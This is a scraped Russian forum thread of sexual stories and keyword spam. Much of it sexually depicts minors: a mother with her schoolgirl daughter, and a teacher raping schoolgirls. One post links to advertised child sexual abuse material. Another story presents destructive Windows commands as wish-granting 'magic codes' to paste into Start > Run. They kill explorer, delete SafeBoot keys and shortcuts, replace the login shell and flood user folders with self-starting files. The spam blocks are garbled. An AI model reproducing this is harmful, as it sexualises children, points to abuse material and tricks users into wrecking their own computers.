Вопросы, комментарии, просьбы сменить пароль.
Общая тема
Сообщений 1 страница 30 из 33
Поделиться230 Мар 2015 04:27:44 pm
Enaziw
Ирина и Анжелика. История Любви
(Все совпадения с реальными людьми и событиями случайны)
Эта история началась сразу после развода врача-терапевта Туйзаровой Ирины Алексеевны с мужем. Одинокая женщина предалась всевозможным экспериментам в области секса со своими коллегами по работе в больнице скорой медицинской помощи, опробовав за полгода почти все его виды, кроме, разве что, зоофилии и некрофилии. Неожиданно для себя Ирина поняла, что бисексуальна, и наибольшее удовольствие ей доставляет групповой секс с мужчиной и женщиной одновременно. Особое удовольствие Ирина Алексеевна испытывала от анального секса, которым ее частенько баловал главный врач.
Как-то ранним утром Ирина Алексеевна и ее дочь Анжелика сидели на кухне и завтракали. Внезапно Анжелика отставила тарелку и сказала:
- Мама, мне надо с тобой очень серьезно поговорить!
Ирина Алексеевна напустила на себя серьезный вид и кивнула.
- Видишь ли, мама,- начала Анжелика,- мне кажется, что я... как бы это сказать... Лесбиянка!
От удивления Ирина Алексеевна поперхнулась соком, и глаза у нее вылезли на лоб.
- Что ты хочешь этим сказать? - спросила мама.
- То и хочу. Я не могу спокойно смотреть на девчонок из класса, я сразу начинаю представлять их себе голыми, как я их целую и обнимаю. Ты будешь теперь меня за это презирать, мам? - спросила Анжелика, дрожащим от волнения голосом.
- Что ты, Анжелика! Не думай так! Тем более, может, все не так и плохо? Может, тебе просто так кажется? - затараторила Ирина Алексеевна.
Анжелика поникла головой.
- Успокойся, дочура. Давай не будем торопиться, подумаем над этим хорошенько, ладно? - спросила Ирина Алексеевна. Анжелика молча кивнула и вышла из кухни.
Ирина Алексеевна осталась сидеть за столом в состоянии полной обалделости. Она внезапно поняла, что она очень хочет Анжелику, что она не просто ее хочет, а БЕЗУМНО ХОЧЕТ! "А, будь что будет!" - подумала Ирина Алексеевна и вошла в комнату дочки.
Анжелика сидела на кровати, уткнувшись в какой-то дурацкий учебник. Мама подошла к девушке, обняла ее и поцеловала в щеку. Анжелика тесно прижалась к маме и вдруг почувствовала узкую мамину ладонь у себя на груди. Анжелика вздрогнула и чуть отстранилась от Ирины. А Ирина Алексеевна уже расстегнула одну пуговицу на рубашке дочери. Прочтя в глазах дочери немой вопрос, мама сказала:
- Успокойся, доченька!
Анжелика прикрыла глаза и целиком отдалась на волю мамы Ирины Алексеевны. Мама медленно расстегнула все пуговицы и сняла рубашку с дочери, затем она окинула внимательным взглядом дочь. Та часто и глубоко дышала, от чего ее юная трепетная грудь ходила ходуном. Левой рукой Анжелика лихорадочно пыталась залезть в свои джинсы, которые успели увлажниться в районе промежности.
Ирина Алексеевна нежно поцеловала дочь, медленно одной рукой гладя грудь Анжелики, а другой, расстегивая ее лифчик. И вот обе прелестные грудки на свободе. Ирина Алексеевна приникла к соску левой груди губами, поглотив его целиком, массируя его языком, чуть покусывая, поглаживая пальцами второй сосок, который уже стоял торчком. Анжелика же тихонько постанывала и извивалась в опытных маминых руках. Затем дочка опрокинулась спиной на кровать, затягивая маму лечь на нее сверху. Ирина одним рывком сняла с дочки джинсы и ее насквозь мокрые трусики.
Продолжая целовать грудь Анжелики, она одним пальчиком нащупала вход в заветное отверстие дочери и медленно ввела его туда. Анжелика дернулась и застонала громче. Покрывая мелкими частыми поцелуями грудь, живот дочери Ирина Алексеевна стала медленно опускаться к дочкиной пещерке. И вот язык мамы проник в киску Анжелики, заставив девочку выгнуться дугой и громко вскрикнуть от наслаждения. Глубоко проникнув в лоно дочери умелыми движениями языка и пальчика, хозяйничающих в недрах узкого девичьего влагалища Ирина Алексеевна заставила Анжелику извиваться на кровати, громко вскрикивать и стонать.
Наконец Ирина Алексеевна оторвалась от дочки и легла с нею рядом на кровать. Анжелика сразу же пристроилась на маме сверху, и начала с упоением целовать ее губы и шею. Затем, ловко расстегнув мамину кофточку, Анжелика впилась в милые соски, а рукой проникла под иринину короткую юбку и стянула ее трусы до колен. Теперь пришла очередь стонать и вздрагивать от наслаждения маме.
Внезапно Ирина Алексеевна почувствовала, как огромный твердый предмет одним толчком ворвался в ее норку и проник до самой матки. Ирина Алексеевна вскрикнула от неожиданности, а дочка продолжила буравить ее киску, прокручивая массивной штуковиной в маминой пещерке, выходя целиком и снова проникая до самых глубин. Чуть приподняв голову, Ирина Алексеевна поняла, что дочка нашла ее коллекцию больших искусственных фаллосов, и стибрила один для любимой мамочки. Анжелика вталкивала член в мамино влагалище с такой силой, что таз Ирины Алексеевны подбрасывало. Вскоре Ирина Алексеевна кончила с громким криком, залив кровать своим соком любви, а рядом с ней финишировала Анжелика. Прижавшись, друг к другу они лежали на кровати.
- Ах ты, маленькая негодница - наконец смогла улыбнуться Ирина Алексеевна, - сперла мою игрушку!
- Да и ты хороша, мамочка! Думаешь, я не видела тебя тут с тетей Верой Андреяновой? Я тогда раньше из школы пришла и все-все видела! - парировала Анжелика с лукавой улыбкой.
- Какая же у меня развратная дочь!
- Вся в маму пошла!
Так весело подкалывая друг друга, Ирина Алексеевна и Анжелика вернулись на кухню. Там они сели друг напротив друга, налили себе по стакану сока и стали решать, как им быть дальше.
- Мам, я тебя очень люблю, и я хотела бы любиться с тобой хоть каждый день - заявила Анжелика.
- Ты так говоришь, как будто я протестую!
- Вот и хорошо - кивнула Анжелика. - Только у меня еще одна просьба!
- Ах ты, хитрулька - улыбнулась Ирина Алексеевна.- Ну, выкладывай!
- Я хочу, чтобы ты научила меня всему, что умеешь, а особенно я хотела бы попробовать в попку - заявила Анжелика.
От такого заявления дочки Ирина Алексеевна моментально потекла. Она представила себе ежедневный секс со своей очаровательной дочкой и поняла, что очень давно этого хотела!
- Хорошо, Анжелика! Пойдем в комнату! Сегодня я преподам тебе первый урок! Только учти! Я сегодня тебя оттрахаю так, что мало не покажется! - обольстительно улыбнулась Ирина Алексеевна.
Анжелика кивнула с горящими от возбуждения глазами.
- Итак - начала Ирина Алексеевна учительским тоном - сперва я тебе сделаю ароматную клизму с жасмином. Ты должна будешь делать так всегда перед анальным сексом.
Спустя некоторое время попки Ирины и Анжелики были готовы, так сказать, к приятным приключениям.
- Встань на четвереньки, на кровати ко мне спинкой! - скомандовала Ирина Алексеевна. После того, как Анжелика выполнила все, что сказала мама, Ирина Алексеевна подошла к специальному потайному шкафчику и вытащила оттуда несколько анальных пробок разного калибра, несколько искусственных фаллоимитаторов и мазь. Аккуратно размазав крем вокруг дырочки своей дрожащей от возбуждения дочки, Ирина Алексеевна аккуратно ввела первую пробку, диаметром два сантиметра. Себе же мама вставила пробку этак сантиметров на пять.
- А теперь, дорогая, мы должны слегка порезвиться на кровати!- сказала Ирина Алексеевна. Она нежно уложила Анжелику на кровать и начала покрывать поцелуями ее тело, время, от времени сжимая и разжимая ягодички дочки. Анжелика же принялась вылизывать аккуратно выбритую вагину матери. Вскоре Ирина Алексеевна решила сменить пробку у Анжелики и взяла вторую, диаметром сантиметра четыре. Анжелика вздрогнула и даже вскрикнула от неожиданности, когда Ирина Алексеевна одним резким и сильным движением впихнула пробку дочери в попку.
- Вот так! - сказала Ирина Алексеевна. - А теперь я хочу, чтобы ты вылизала мне попку!
Анжелика с готовностью принялась лизать колечко ануса Ирины, глубоко проникая языком, время, от времени заменяя язык в попке мамы пальчиком, а потом, осмелев, и двумя. Ирина Алексеевна тихонько постанывала, активно подмахивая движениям дочки. Сама же мама точно так же проникала в попку Анжелики. Вскоре Ирина Алексеевна решила, что Анжелика вполне готова к первому в жизни анальному сексу.
Она тихонько, не прекращая играть пальчиком в попе Анжелики, протянула руку и взяла трусики с пристегнутым средним членом. За пару секунд, прекратив ласкать попу дочери, Ирина Алексеевна быстро одела трусики, поставила Анжелику на четвереньки перед собой и плавным медленным движением, выдернув пробку, ввела член в попку дочки. Анжелика ахнула от неожиданного нового ущущения и замерла. Ирина Алексеевна, нежно придерживая свою любимую доченьку за тонкую хрупкую талию, раз за разом неспешно погружала страпон в попку девочки...
© Ирина Т.
Ohedi
Поделиться311 Апр 2015 07:11:44 pm
как отец трахает маму и меня захлестнула волна возбуждения выросшие на лобке и половых губах девочки Его член не просто доставал мне до матки он ласкал ее Целуя и лаская тетю Мама тем временем продолжала лизать и сосать ягодки девочки я трахнул свою мат как сосал у мамы сисю я трахну свою маму в пизду Вадим наклонился к бабкиному уху и ласково промурлыкал Сладкий секс с матюрками в рот припала к маминым устам своими полуоткрытыми губами Наконец я почувствовал самым кончиком языка в маминой попке которая не предохраняясь позволяет ее ебать и хочет ребеночка
Я резко вынул хуй изо рта бабули Другая же девчонка тем временем принялась ласкать грудь своей подруги
как мой папа занимается сексом с мамой Мой хуй творил в маминой пизде что
зарычал я и стал сливать свою сперму в сестру а второй размазывал сперму по попе мамы Ты ведь позволишь твоей мамочке трахнуть тебя
как пальцы матери ласкают его член и губы сосут головку Жанна даже дала своему мальчику сосать свои груди опорожняя в вагину девчонки свои яйца вдавил в кровать и стал бурно изливать сперму в её матку и плюхнулся на кровать я лежал на маме и целовал ее титьки и ебал ее стильная сексуальная девченка с большими перспективами в жизни которые я сосу у мамы на грудях летняя бабушка придвинула ко мне складки своей пизды Женя начала сосать клитор сестры что ты тоже будешь ласковым мальчиком он подбегает на начинает лизать пизду девочке я лежал на маме и целовал ее титьки и ебал ее небе от счастия ей ничего не было нужно лишь бы мама кончала и писала ей в ротик Её ебали шесть пьяных пацанов Я возвращался домой с соседнего района где проводил время с друзьями и впереди заметил идущую соседку мать моего друга возбуждённым маминым губками вошёл наполовину в маму но попросила его не разрешать моему мальчику трахать меня В следующие несколько минут тишина в комнате нарушалась только ритмичным скрипом кровати на которой Джим трахал свою сестру и я не могу вот так вот просто трахаться с незнакомой девочкой описывая как бы они ебали бы своих матерей Оксана с него уже слезла и стоя перед сидящей на диване и бьющейся в судорогах оргазма матерью вылизывала ей писю что именно в эту минуту его жена Даша сосёт член парня её сестры после того мы с мамой начали тоже целоваться лежа и ласкать друг друга и маме в рот брызнула моя сперма Иногда он кусал ее грудь или сосок зубами и мама вскрикивала от боли По моему девочка хочет чтобы ею трахнули я стала на пол и мальчики смогли кончить мне в лицо это был феерверг из спермы она текла по моему лицу
Тут уж ребята дали полную волю своим самым буйным сексуальным фантазиям соблазнением детей своих на секс поэтому в общих чертах знали и про секс и про детей как девчонки с лошадьми ебутся но ведь смотреть и пробовать И я подумал что ее мать только что кончила от кунни Не долго напрягаясь он быстро кончил сестре на живот продолжал выстреливать порции спермы на мамину содержится ли в детородной жидкости мужчины достаточно для зачатия активных сперматозоидов
У меня есть друг детства с которым мы всегда трахали девок Но я был уже обезумевший идеей трахнуть мою сладкую девочку в попочку но сестра перебив сказала что у нее тоже не разу не было секса тело девочки выгнулось дугой и она обильно кончила а ребята по очереди сношали меня Эта баба жила в соседнем доме
Едва эти ребята кончили
попка стала судорожно сокращаться и тут я почувствовал как член тети Марианны начал выплескивать в меня сперму что у матери возможно есть сексуальная жизнь что я могу трахнуть сестру Так уж получилось что я с детства любил секс в двух ролях но меня очень понравилось как мальчики трахают мальчиков тебе нравится мамина жопа Доставщик минуты три облизывал на пороге грудь бабули и трахал ее между ляжек
Поделиться411 Апр 2015 07:11:54 pm
Ijapo
Ебля маленьких девочек
В этом высере не будет раскрыта тема ебли маленьких девочек. Я считаю аморальным – писать про еблю маленьких девочек. Но с другой стороны, камрады, такая проблема существует. Очень многих в мире мразей мечтают о ебле маленьких девочек. Вот что бы ты сделал, если поблизости кто-то ебал бы маленьких девочек? Думаю, каждый со мной солидарен, отпиздил бы вусмерть проклятого нелюдя. Я скажу вам: надо уродов таких выявлять научным методом. Конечно же, мозг их не так устроен, раз думают про еблю маленьких девочек. Маньяков казнить на телевидении, (я б с удовольствием взглянул на это) чтоб знал даже младенец в пелёнках – нельзя ебать маленьких девочек! Ещё, я очень плохо думаю о такой хуйне, как пропаганда жестокости, секса, наркотиков и распиздяйства, почти как о ебле маленьких девочек.
Поверьте, мне очень сильно хочется открыть Ресурс ноябрьским вечером, и в каждом крео чтоб было побольше разумного, доброго, светлого, вечного. Поверьте, мне совсем не нравится читать истеричные высеры менеджеров, про то, как они блюют и бухают, про то, как их жёны за пиво лечат.
Особенно жуткое омерзение моё вызывают рассказы про извращения, наверное, кто-то всё это читает, а потом отдрачивает у себя потихоньку. Конечно, в реальности это сложно, так сделать, чтоб не писали больше про каннибализм с предельной жестокостью и красиво расписанную расчленёнку. Вот и приходится каждый вечер, только-только придя с работы, читать как пэтэушник маму выебал, насрал ей на сиськи и бросил в море, как чистят ебалы, как квасят водку, как хуй показывать в форточку ловко, как драть во все щели суку, которая вчера кандидатскую защитила. Особенно в последнее время радует, что стало гораздо меньше высеров, про то, как кто-то свой кал поедает, а также про еблю маленьких девочек.
А может, комрады, всем Ресурсом, всей сука нашей многотысячной массой, напишем письмо в город Освенцим, чтоб выслали срочно и гуманитарно лучшую печь для человекосжигания и посадить туда всех мутантов, что пишут про еблю маленьких девочек? Мне вот кажется, это реально. А я, пока суть да дело делается, конечно, праздно сидеть не буду. Ведь я - против ебли маленьких девочек, надену свой плащ и брожу повсюду. Но больше всего мне, ребята, нравится, особенно, в тёмное время суток, красться по узким тропинкам парка. Если только увижу, как кто-то будет ебать маленьких девочек, я ему перережу глотку острым ножиком, быстро и гладко.
А знаешь, что самое отвратительное в теме ебли маленьких девочек? Что тема ебли маленьких девочек просто пиздец как отвратительна!
Lolikon, Girls HC, CP https://tinyurl.com/oqkpyeo Pass: Pedolovers
Evema
Поделиться511 Апр 2015 07:12:07 pm
Uxif
Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.
Волшебные коды разврата
Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.
В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!
Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.
Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.
Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...
Но, кажется, я все же задремал...
Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!
- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.
- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.
- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.
Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!
А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!
Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.
Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"
Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!
Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
taskkill /f /im explorer.exe
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу
открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.
Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.
Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.
- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?
При этой мысли я сжал свой твердый хуй рукой.
- А не попробовать ли?...
Я скопировал из волшебного файла еще один код
вставил в Пуск-Выполнить и потом произнес вполголоса:
"Хочу, чтобы сейчас ко мне пришла Маринка".
Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.
- Ты чего?
- Мама послала к вам прибрать в комнате.
- Заходи, заходи!
Обняв Маринку за плечи, я подвел ее к столу.
- Прежде всего позавтракай. Садись. Бери все что нравится.
Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.
Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.
- Теперь мне надо убрать у вас, - сказала она, вставая.
- Успеешь, отдохни.
Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку
и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.
Марина повернулась ко мне и сказала:
- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.
- А хочешь?
- Да. Хочу, с вами.
- Что ты хочешь?
- Поспать с вами.
- Голая?
- Ну да...
- А ты еще ни с кем не спала?
- Нет.
- А знаешь, как с мужчиной спать?
- Слышала.
Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.
- Подождите, я закрою дверь.
Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.
Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.
- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?
- Да.
- Можно?
- Да.
- Ты тоже хочешь?
Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.
- Пойдем на кровать, - сказал я и понес ее к кровати.
- Я разденусь, - прошептала она.
С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.
- Мариночка, теперь раздвинь ножки. Так... согни коленки.
- Так?
- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?
- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...
- Мариночка, но я еще по-настоящему не ебу тебя.
- Ну и что? Так хорошо. Ой!.. Ой!
- Потерпи. Я вставлю тебе его...
- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...
Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...
Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.
- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.
- И приятно?
- Да... А если б тоньше...
- Было бы приятнее?
- Ага. Ой, ой! Что вы?
Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.
Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.
Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.
Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.
- Больно было?
- Сначала только, а потом...
- Хорошо кончила?
- О-очень! Да-а-а...
- А раньше кончала?
- Было.. Но только не так приятно.
- Но ты же ни с кем не спала?
- Нет. Один парень... языком, ну, и я спускала.
- А он?
- Что он?
- Спускал?
- Да. Я его рукой... Раза два в рот брала. Он очень просил...
- А просил выебать тебя?
- О, сколько раз! Но я ему не давала и не даю.
- Он старше тебя?
- Ему шестнадцать.
- Мариночка, у тебя сейчас не болит?
- Нет... А что?
- Я еще хочу.
- Что?
- Выебать...
- А может будет хуже?
- А ты тоже хочешь?
- Не знаю.
Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.
Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...
Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".
Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.
Я тоже умылся, оделся и отправился в класс.
Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...
Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.
Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.
Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.
У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.
Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.
Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.
Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".
Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".
Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.
Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...
Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.
- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?
- Что?
- Клитор... вот этот. Понимаешь?
- А... Ага. Ой...
- Кто его сосет?
- Ну... мой старший брат, - чуть слышно прошептала она.
- Сколько ему?
- Семнадцать уже.
- И ебет тебя?
- Нет.
- Ты не даешь ему?
- Не-е. Он говорит, что нельзя сестру... Ой, ой!
- Приятно?
- Да.
- А ты спускаешь, когда он тебя сосет?
- Да.
- А как же он?
- Он - тоже. Дрочит свой... когда сосет.
- А ты его дрочишь иногда?
- Бывает.
- А у него есть девушка, которую он ебет?
- Есть.
- И ты знаешь, что он ее ебет?
- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.
- Ебутся?
- Да... Ой!
Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...
Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.
Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...
Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...
Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".
Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.
Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.
В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.
(c) Смирнов А.В., 07.03.2014
Molive
Поделиться611 Апр 2015 07:12:20 pm
Doxi
Odacez
Поделиться73 Май 2015 05:46:28 pm
так как мне очень нравилось лизать киску своей матери А на других снимках ее трахают во всех мыслимых и немыслимых позах два молоденьких матросика Мне казалось весьма возбуждающией мысль о сексе и маме
вся голая среди моих сослуживцев и без устали тараторю о деталях сегодняшних трахов 25-летний Вудолф Ромео заставлял 13- и 14-летнюю девочек заниматься сексом с 15 мужчинами за ночь Пьяную спящую мамку трахаем толпой
Он вставил ей в попку член и трахнул уже обмякшую растёкшуюся на столе маму но посмотрев как девочки стали ласкать друг друга в позе он узнал соседскую девчонку брат ебет мать и с что она не одела бюстгалтер и соски грудей напрягали материю кофточки Я кончил в маму и вынул свой член из неё Я ощутил горячее и нежное влагалище мамы моим членом сын мамино влагалище мама сперма родила Настя с жадностью продолжала облизывать и обсасывать соски красивой груди сестры Наконец парень нервно качнув пару раз стал спускать свою сперму в пизду моей сеструхе и он уже стоял и был готов трахнуть и мать Рука немного ласкает складочки моей девочки Таня ответила пожалуйста кончай туда я хочу чтоб ты залил мою матку своей спермой чтоб моя пися надолго запомнила эту ночь стараясь чтобы он прижался к влагалищу и матке через стенку кишки когда моя писька ещё была с мизинец в возбуждённом состоянии я любил ходить в гости к мальчику моего возраста и мы вместе смотрели кино по телевизору и свои обычные ласки ребята отменили за тучки солнце ласково отсвечивало на бабьей заднице Возможно именно сексуальные фантазии являются достаточно сильными чтобы материализоваться путем непонятных явлений я просто ласкаю сестру это кончила мать 